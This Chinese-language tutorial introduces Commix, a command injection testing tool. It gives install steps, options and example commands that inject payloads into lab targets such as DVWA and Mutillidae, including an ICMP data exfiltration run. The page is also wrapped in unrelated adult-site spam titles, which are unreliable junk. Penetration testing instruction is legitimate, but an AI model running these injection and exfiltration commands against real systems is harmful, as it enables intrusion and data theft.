成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

系統命令注入漏洞自動化測試工具——Commix

作者:phper
安全 數據安全 自動化
Commix是一個適用于web開發者、滲透測試人員及安全研究者的自動化測試工具,可以幫助他們更高效的發現web應用中的命令注入攻擊相關漏洞。Commix由Python編寫。

Commix是一個適用于web開發者、滲透測試人員及安全研究者的自動化測試工具,可以幫助他們更高效的發現web應用中的命令注入攻擊相關漏洞。Commix由Python編寫。

系統命令注入漏洞自動化測試工具 – Commix

環境要求
Python 2.6.x或2.7.x

安裝
下載git clone https://github.com/stasinopoulos/commix.git commix

使用

基本使用

Usage: python commix.py [options]

選項

-h, --help Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

目標

--url=URL           Target URL.
--url-reload        Reload target URL after command execution.

請求

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

注入

--data=DATA         POST data to inject (use 'INJECT_HERE' tag).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
                    'ip_src=192.168.178.1,ip_dst=192.168.178.3').

測試示例

測試漏洞web應用Damn 

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

使用注入攻擊Payload參數測試php-Charts 1.0

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'"

使用特殊的頭和HTTP代理測試OWASP Mutillidae

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

使用ICMP滲漏(exfiltration)技術測試Persistence

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""

責任編輯:王雪燕 來源: FreeBuf黑客與極客
測試工具漏洞自動化測試工具
相關推薦

2012-12-24 22:54:31

2014-11-12 09:24:00

2011-05-30 17:50:23

分布式測試

2022-07-04 09:00:36

Playwright自動化測試工具

2011-05-31 18:17:07

分布式測試

2014-12-04 15:01:13

2022-08-08 07:35:37

云測試工具云存儲云計算

2009-07-06 10:08:03

Flex自動化

2011-11-18 09:11:21

Web

2010-08-10 14:34:37

QTPFlex

2010-08-10 14:25:42

SilkTestFlex

2011-06-08 17:15:46

QTP腳本

2021-12-17 10:01:52

人工智能測試工具

2022-06-02 09:00:00

人工智能工具自動化測試

2010-08-10 14:18:15

RationalFunFlex

2022-12-04 23:52:11

iOS自動化工具

2019-01-23 09:00:00

2020-08-07 08:10:25

開源技術 工具

2012-09-17 13:21:22

iOSAndroid自動化測試工具

2020-04-09 13:16:48

自動化工具腳本
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 男女视频免费 | 日韩成人精品一区二区三区 | 国产亚洲精品a | 精品欧美乱码久久久久久 | 野狼在线社区2017入口 | 精品自拍视频在线观看 | 日韩高清中文字幕 | 成人精品毛片 | 91黄色片免费看 | 91久久国产综合久久 | 日韩福利在线 | 色综合天天天天做夜夜夜夜做 | 日日操av | 中文字幕在线视频精品 | 欧美日批| 成人国产在线观看 | 狠狠操操| 精品国产青草久久久久96 | 国产真实乱全部视频 | 久久成人一区 | www亚洲成人 | 一区二区三区精品视频 | 久久国产精品一区二区三区 | 亚洲成人自拍网 | 中文字幕亚洲区一区二 | 欧美久操网 | 亚洲国产成人精品女人久久久 | 精品蜜桃一区二区三区 | 国产精品久久久久久av公交车 | 日本一区二区三区视频在线 | 天天草夜夜骑 | 欧美日韩亚洲国产 | 精品一区二区三区不卡 | 国产午夜精品一区二区三区嫩草 | 欧美在线 | 天天操天天干天天透 | 高清欧美性猛交xxxx黑人猛交 | 三级av免费| 日韩图区| 国产高清在线 | 91久久久久久久 |